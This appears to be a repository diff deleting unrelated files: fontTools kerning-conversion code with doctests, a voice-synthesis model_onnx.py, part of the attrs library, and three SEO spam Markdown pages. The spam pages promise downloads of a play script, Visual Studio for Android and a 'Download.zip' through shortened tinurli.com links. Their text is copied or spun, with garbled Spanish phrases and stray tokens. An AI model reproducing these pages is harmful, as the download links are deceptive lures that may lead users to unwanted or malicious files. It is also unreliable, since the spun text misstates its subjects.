kerning dictionary as needed. - newKerning = {} - for first, seconds in list(kerning.items()): - first = firstRenamedGroups.get(first, first) - newSeconds = {} - for second, value in list(seconds.items()): - second = secondRenamedGroups.get(second, second) - newSeconds[second] = value - newKerning[first] = newSeconds - # Make copies of the referenced groups and store them - # under the new names in the overall groups dictionary. - allRenamedGroups = list(firstRenamedGroups.items()) - allRenamedGroups += list(secondRenamedGroups.items()) - for oldName, newName in allRenamedGroups: - group = list(groups[oldName]) - groups[newName] = group - # Return the kerning and the groups. - return newKerning, groups, dict(side1=firstRenamedGroups, side2=secondRenamedGroups) - - -def findKnownKerningGroups(groups): - """ - This will find kerning groups with known prefixes. - In some cases not all kerning groups will be referenced - by the kerning pairs. The algorithm for locating groups - in convertUFO1OrUFO2KerningToUFO3Kerning will miss these - unreferenced groups. By scanning for known prefixes - this function will catch all of the prefixed groups. - - These are the prefixes and sides that are handled: - @MMK_L_ - side 1 - @MMK_R_ - side 2 - - >>> testGroups = { - ... "@MMK_L_1" : None, - ... "@MMK_L_2" : None, - ... "@MMK_L_3" : None, - ... "@MMK_R_1" : None, - ... "@MMK_R_2" : None, - ... "@MMK_R_3" : None, - ... "@MMK_l_1" : None, - ... "@MMK_r_1" : None, - ... "@MMK_X_1" : None, - ... "foo" : None, - ... } - >>> first, second = findKnownKerningGroups(testGroups) - >>> sorted(first) == ['@MMK_L_1', '@MMK_L_2', '@MMK_L_3'] - True - >>> sorted(second) == ['@MMK_R_1', '@MMK_R_2', '@MMK_R_3'] - True - """ - knownFirstGroupPrefixes = ["@MMK_L_"] - knownSecondGroupPrefixes = ["@MMK_R_"] - firstGroups = set() - secondGroups = set() - for groupName in list(groups.keys()): - for firstPrefix in knownFirstGroupPrefixes: - if groupName.startswith(firstPrefix): - firstGroups.add(groupName) - break - for secondPrefix in knownSecondGroupPrefixes: - if groupName.startswith(secondPrefix): - secondGroups.add(groupName) - break - return firstGroups, secondGroups - - -def makeUniqueGroupName(name, groupNames, counter=0): - # Add a number to the name if the counter is higher than zero. - newName = name - if counter > 0: - newName = "%s%d" % (newName, counter) - # If the new name is in the existing group names, recurse. - if newName in groupNames: - return makeUniqueGroupName(name, groupNames, counter + 1) - # Otherwise send back the new name. - return newName - - -def test(): - """ - No known prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "CGroup" : 3, - ... "DGroup" : 4 - ... }, - ... "BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "CGroup" : 7, - ... "DGroup" : 8 - ... }, - ... "CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "CGroup" : 11, - ... "DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "BGroup" : ["B"], - ... "CGroup" : ["C"], - ... "DGroup" : ["D"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... } - >>> kerning == expected - True - >>> expected = { - ... "BGroup": ["B"], - ... "CGroup": ["C"], - ... "DGroup": ["D"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... } - >>> groups == expected - True - - Known prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "@MMK_R_CGroup" : 3, - ... "@MMK_R_DGroup" : 4 - ... }, - ... "@MMK_L_BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "@MMK_R_CGroup" : 7, - ... "@MMK_R_DGroup" : 8 - ... }, - ... "@MMK_L_CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "@MMK_R_CGroup" : 11, - ... "@MMK_R_DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "@MMK_L_BGroup" : ["B"], - ... "@MMK_L_CGroup" : ["C"], - ... "@MMK_L_XGroup" : ["X"], - ... "@MMK_R_CGroup" : ["C"], - ... "@MMK_R_DGroup" : ["D"], - ... "@MMK_R_XGroup" : ["X"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... } - >>> kerning == expected - True - >>> expected = { - ... "@MMK_L_BGroup": ["B"], - ... "@MMK_L_CGroup": ["C"], - ... "@MMK_L_XGroup": ["X"], - ... "@MMK_R_CGroup": ["C"], - ... "@MMK_R_DGroup": ["D"], - ... "@MMK_R_XGroup": ["X"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern1.XGroup": ["X"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... "public.kern2.XGroup": ["X"], - ... } - >>> groups == expected - True - - >>> from .validators import kerningValidator - >>> kerningValidator(kerning) - (True, None) - - Mixture of known prefixes and groups without prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "@MMK_R_CGroup" : 3, - ... "DGroup" : 4 - ... }, - ... "BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "@MMK_R_CGroup" : 7, - ... "DGroup" : 8 - ... }, - ... "@MMK_L_CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "@MMK_R_CGroup" : 11, - ... "DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "BGroup" : ["B"], - ... "@MMK_L_CGroup" : ["C"], - ... "@MMK_R_CGroup" : ["C"], - ... "DGroup" : ["D"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... } - >>> kerning == expected - True - >>> expected = { - ... "BGroup": ["B"], - ... "@MMK_L_CGroup": ["C"], - ... "@MMK_R_CGroup": ["C"], - ... "DGroup": ["D"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... } - >>> groups == expected - True - """ - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md b/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md deleted file mode 100644 index 4bc91b63b64e3dbd73e2c205f8b3458b70c8ecd6..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md +++ /dev/null @@ -1,17 +0,0 @@ - -

    Por primera vez, el Centro Cultural PUCP (CCPUCP) presenta una obra teatral en formato audiovisual: se trata de Conferencia sobre la lluvia, un monólogo del escritor mexicano Juan Villoro, protagonizado por Alberto Isola, docente PUCP y destacado actor y director nacional.

    -

    Conferencia Sobre La Lluvia Juan Villoro Pdf


    Downloadhttps://tinurli.com/2uwkwd



    -

    En esta ocasión, seremos espectadores de una inusual conferencia académica: un bibliotecario, interpretado por Isola, empieza a hablar sobre la relación entre la literatura y la lluvia. Sin embargo, de a pocos, este discurso se transforma en una lluvia de confesiones sobre el amor, la soledad, las emociones y otros temas universales.

    -

    ¿Qué le parece que su obra Conferencia sobre la lluvia se lleve a cabo en un formato virtual por el Centro Cultural PUCP?

    -

    Me da mucho gusto que Conferencia sobre la lluvia se presente en Perú con un actor de la talla de Alberto Isola. He tenido la suerte de que la obra se presente en países tan diversos como Japón (donde tuve que seguirla por el ritmo de las palabras, pues no entendía nada), Italia o Colombia (donde la protagonista fue una mujer). El director, Marco Mühletaler, ha entendido a la perfección el texto para la versión peruana, de modo que estoy muy contento. La obra trata de un bibliotecario que, al querer dar una conferencia, se despista y habla de cosas personales. De la conferencia pasa a la confesión. No solo se ha puesto en teatros, sino en ferias del libro, bibliotecas y congresos de literatura (a veces sin avisar que se trata de una representación teatral y no de una conferencia en serio). Ojalá tenga esta suerte en Perú cuando termine la pandemia.

    -

    -

    Los espectáculos unipersonales se prestan para una representación en línea. Además, la obra trata del aislamiento. El protagonista es un bibliotecario que vive inmerso en los libros y se relaciona con dificultad con la realidad. Anhela dar una conferencia sobre la relación entre la poesía amorosa y la lluvia, pero no está seguro de poder lograrlo. La gran pregunta de un monólogo es por qué alguien habla solo, ¿qué lo lleva a perorar de esa manera? Esto se explica al final de Conferencia sobre la lluvia y, naturalmente, no voy a revelarlo. Solo diré que tiene que ver con los remedios que encontramos para la soledad y el aislamiento, algo que nos toca muy de cerca en estos tiempos.

    -

    Conferencia sobre la lluvia aborda una situación teatral por excelencia: hablar en público. Un conferencista extravía sus papeles y el acero lo lleva a decir cosas impensadas. El tema de la charla es la relación entre la lluvia y la poesía amorosa. En el vértigo de la improvisación, el protagonista habla de sí mismo pero no su abandona propósito original: un su mente acuden poetas que han cambiado el clima con sus versos. De manera fascinante se mezclan dos formas del discurso: la conferencia y la confesión. Si un libro depende del lector, una conferencia depende del público. La voz tiene sentido si alguien la oye. Misteriosamente, también define a quien la oye. Escuchar es ser interpretado. «Es una aleta de cuentas una historia amorosa; historia de soledad, en el que el ser humano se busca dentro de las metáforas poéticas que habitan los libros y que dan cuenta, con gran eficacia, de la inaprensible subjetividad humana.» Juan Hernández

    -

    La afirmación del bibliotecario conmueve; además de sencilla y poética es cierta: dice que en los libros llueve. Conferencia sobre la lluvia es el mundo de estantes y páginas imaginado por el mexicano Juan Villoro, en donde el actor y director Fabián Vena eligió sumergir su sensibilidad. La experiencia lo tiene feliz y tendrá doble función en Sala Arteón (Sarmiento 778): hoy a las 21.30 y mañana a las 20.30 (y una masterclass de actuación que será hoy de 14 a 17).

    -

    -Fueron muchos y enormes. El principal era barrer con mi prejuicio y temor sobre el unipersonal, porque en general carecen de una convención fuerte que permita que sea sólido o verosímil, con una persona que está hablando sola durante una hora; pero después me tranquilicé, pensando que no está tan loco quien habla durante una hora en comparación de quien lo escucha. Por otra parte, soy un obsesivo de la estructura, a veces los unipersonales no recorren ese camino y es ahí donde aparecen sus fallas. En este sentido, me balanceé claramente sobre el material, al darme cuenta primero que la convención era estupenda, algo que ya describe el mismo autor en el prólogo del libro, diciendo que no hay nada más teatral que una conferencia. La estructura dramática marca un recorrido de unidades, de in crescendos, donde sus estados emocionales pautan claramente el recorrido del texto, de menor a mayor como tiene que suceder en toda obra. Luego viene la mirada de la dirección; me gusta pararme desde allí no sólo como un hecho creativo y de búsqueda con los actores, que son quienes en definitiva terminan armando la puesta, sino también como un desafío a la hora de mantener la atención del público. Cuando dirijo me planto como espectador, y no necesito que me vendan nada. Así que estuve muy pendiente de que este malabarista pueda todo el tiempo captar la atención del espectador, para que no se vaya a ningún otro lado que no sea el de la escucha y la mirada que tiene sobre ese personaje. Trabajé mucho en el recorrido de este hombre alrededor de esa biblioteca y también con la música, porque mueve inmediatamente el estado emocional; y sumé el aporte del lenguaje audiovisual, presente de principio a fin con una pantalla en la que se recorre un camino paralelo, que puede estar al margen de lo que le pasa al personaje.

    -

    En cuanto a las obras, una de ellas, El filósofo declara es una comedia de la neurosis entre dos filósofos fue puesta en escena en el Teatro Romea de Barceloa con Mario Gas como protagonista. Mi monólogo Conferencia sobre la lluvia está por estrenarse en Madrid dirigido por Guillermo Heras. Pero no he sido un participante activo del teatro en España, de modo que este libro es una carta de presentación y me da mucho gusto que la editorial Punto de Vista me acompaña en esta aventura.

    -

    Voy a a leer dos breves fragmentos del monólogo: Conferencia sobre la lluvia. Es la historia de un bibliotecario que quiere dar una conferencia sobre la muy fecunda relación entre la poesía amorosa y la lluvia, pero pierde los papeles y empeiza a improvisar y al hacerlo se deja llevar por la confesión personal. Al final del monólogo, yo no lo voy a revelar aquí, sabemos a quién está dirigida esta muy peculiar alocución. Hablaré de dos pasajes en donde él se refiere a los libros y un tanto al amor:

    -

    En este volumen se recogen seis textos dramáticos de Juan Villoro: El filósofo declara, Muerte parcial, Conferencia sobre la lluvia, La desobediencia de Marte, Cremación y La guerra fría, los cuales se acompañan de un prólogo del investigador teatral y filósofo Víctor Molina, y una entrevista que la historiadora y crítica teatral Zavel Castro hace al autor.

    -

    Para un hombre que vive del orden de las cosas, en este caso, sus libros, escribir una conferencia y perderla es un acto fallido idóneo para permitirse una digresión que apunta a hablar de él. El tema de la conferencia en realidad es un pretexto, nuestro bibliotecario necesita hablar de lo que llueve en él más que de la lluvia en sí.

    aaccfb2cb3
    -
    -
    \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md b/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md deleted file mode 100644 index 9550a4a1392bde21c21668690220024c5132e09c..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md +++ /dev/null @@ -1,10 +0,0 @@ -
    -

    Visual Studio Debugger includes features targeting easier debugging of multi-threaded applications. In debugging mode, in the Threads window, which lists all the threads, hovering over a thread displays the stack trace of that thread in tooltips.[148] The threads can directly be named and flagged for easier identification from that window itself.[149] In addition, in the code window, along with indicating the location of the currently executing instruction in the current thread, the currently executing instructions in other threads are also pointed out.[149][150] The Visual Studio debugger supports integrated debugging of the .NET 3.5 Framework Base Class Library (BCL) which can dynamically download the BCL source code and debug symbols and allow stepping into the BCL source during debugging.[151] As of 2010[update] a limited subset of the BCL source is available, with more library support planned for later.

    -

    Download Android For Visual Studio 2010


    DOWNLOAD ✑ ✑ ✑ https://tinurli.com/2uwkMc



    -

    Visual Studio 2010 comes with .NET Framework 4 and supports developing applications targeting Windows 7.[154] It supports IBM Db2 and Oracle databases, in addition to Microsoft SQL Server.[154] It has integrated support for developing Microsoft Silverlight applications, including an interactive designer.[154] Visual Studio 2010 offers several tools to make parallel programming simpler: in addition to the Parallel Extensions for the .NET Framework and the Parallel Patterns Library for native code, Visual Studio 2010 includes tools for debugging parallel applications. The new tools allow the visualization of parallel Tasks and their runtime stacks.[157] Tools for profiling parallel applications can be used for visualization of thread wait-times and thread migrations across processor cores.[158] Intel and Microsoft have jointly pledged support for a new Concurrency Runtime in Visual Studio 2010[159]and Intel has launched parallelism support in Parallel Studio as an add-on for Visual Studio.[160]

    -

    Visual Studio 2010 features a new Help System replacing the MSDN Library viewer. The Help System is no longer based on Microsoft Help 2 and does not use Microsoft Document Explorer. Dynamic help containing links to help items based on what the developer was doing at the time was removed in the final release,[163] but can be added back using a download from Microsoft.[164]

    -

    The final release of Visual Studio 2013 became available for download on October 17, 2013, along with .NET 4.5.1.[190] Visual Studio 2013 officially launched on November 13, 2013, at a virtual launch event keynoted by S. Somasegar and hosted on events.visualstudio.com.[191] "Visual Studio 2013 Update 1" (Visual Studio 2013.1) was released on January 20, 2014.[192]Visual Studio 2013.1 is a targeted update that addresses some key areas of customer feedback.[193]"Visual Studio 2013 Update 2" (Visual Studio 2013.2) was released on May 12, 2014.[194]Visual Studio 2013 Update 3 was released on August 4, 2014. With this update, Visual Studio provides an option to disable the all-caps menus, which was introduced in VS2012.[195]"Visual Studio 2013 Update 4" (Visual Studio 2013.4) was released on November 12, 2014.[196]"Visual Studio 2013 Update 5" (Visual Studio 2013.5) was released on July 20, 2015.[197]

    -

    Downloading Microsoft Visual Studio 2010 10.0.40219.1 from the developer's website was possible when we last checked. We cannot confirm if there is a free download of this software available. The actual developer of the software is Microsoft.

    -

    aaccfb2cb3
    -
    -
    \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md b/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md deleted file mode 100644 index 713498733cf4b0ac2cf1fa6fd4a5c927925f12e2..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Using Computers In The Medical Office: Microsoft Word Excel And Powerpoint 2013 Download.zip


    Download File ····· https://tinurli.com/2uwjpE



    -
    - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py b/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py deleted file mode 100644 index eaae733358b3b3b33dfb6ab2a797d82b99a53747..0000000000000000000000000000000000000000 --- a/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py +++ /dev/null @@ -1,328 +0,0 @@ -import copy -import math -import torch -from torch import nn -from torch.nn import functional as F - -import attentions -import commons -import modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_lengths, f0=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = x + self.f0_emb(f0.long()).transpose(1,2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - - return z, m, logs, x_mask - - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for i in range(0, total_frames-partial_frames, partial_hop): - mel_range = torch.arange(i, i+partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:,-partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:,s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - #embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - **kwargs): - - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.enc_p_ = TextEncoder(ssl_dim, inter_channels, hidden_channels, 5, 1, 16,0, filter_channels, n_heads, p_dropout) - hps = { - "sampling_rate": 32000, - "inter_channels": 192, - "resblock": "1", - "resblock_kernel_sizes": [3, 7, 11], - "resblock_dilation_sizes": [[1, 3, 5], [1, 3, 5], [1, 3, 5]], - "upsample_rates": [10, 8, 2, 2], - "upsample_initial_channel": 512, - "upsample_kernel_sizes": [16, 16, 4, 4], - "gin_channels": 256, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - def forward(self, c, c_lengths, f0, g=None): - g = self.emb_g(g.unsqueeze(0)).transpose(1,2) - z_p, m_p, logs_p, c_mask = self.enc_p_(c.transpose(1,2), c_lengths, f0=f0_to_coarse(f0)) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g, f0=f0.float()) - return o - diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py deleted file mode 100644 index 7f5d9610f3cf0010a9185579f7188df5ff609384..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py +++ /dev/null @@ -1,477 +0,0 @@ -# SPDX-License-Identifier: MIT - - -import copy - -from ._compat import PY_3_9_PLUS, get_generic_base -from ._make import NOTHING, _obj_setattr, fields -from .exceptions import AttrsAttributeNotFoundError - - -def asdict( - inst, - recurse=True, - filter=None, - dict_factory=dict, - retain_collection_types=False, - value_serializer=None, -): - """ - Return the *attrs* attribute values of *inst* as a dict. - - Optionally recurse into other *attrs*-decorated classes. - - :param inst: Instance of an *attrs*-decorated class. - :param bool recurse: Recurse into classes that are also - *attrs*-decorated. - :param callable filter: A callable whose return code determines whether an - attribute or element is included (``True``) or dropped (``False``). Is - called with the `attrs.Attribute` as the first argument and the - value as the second argument. - :param callable dict_factory: A callable to produce dictionaries from. For - example, to produce ordered dictionaries instead of normal Python - dictionaries, pass in ``collections.OrderedDict``. - :param bool retain_collection_types: Do not convert to ``list`` when - encountering an attribute whose type is ``tuple`` or ``set``. Only - meaningful if ``recurse`` is ``True``. - :param Optional[callable] value_serializer: A hook that is called for every - attribute or dict key/value. It receives the current instance, field - and value and must return the (updated) value. The hook is run *after* - the optional *filter* has been applied. - - :rtype: return type of *dict_factory* - - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 16.0.0 *dict_factory* - .. versionadded:: 16.1.0 *retain_collection_types* - .. versionadded:: 20.3.0 *value_serializer* - .. versionadded:: 21.3.0 If a dict has a collection for a key, it is - serialized as a tuple. - """ - attrs = fields(inst.__class__) - rv = dict_factory() - for a in attrs: - v = getattr(inst, a.name) - if filter is not None and not filter(a, v): - continue - - if value_serializer is not None: - v = value_serializer(inst, a, v) - - if recurse is True: - if has(v.__class__): - rv[a.name] = asdict( - v, - recurse=True, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - 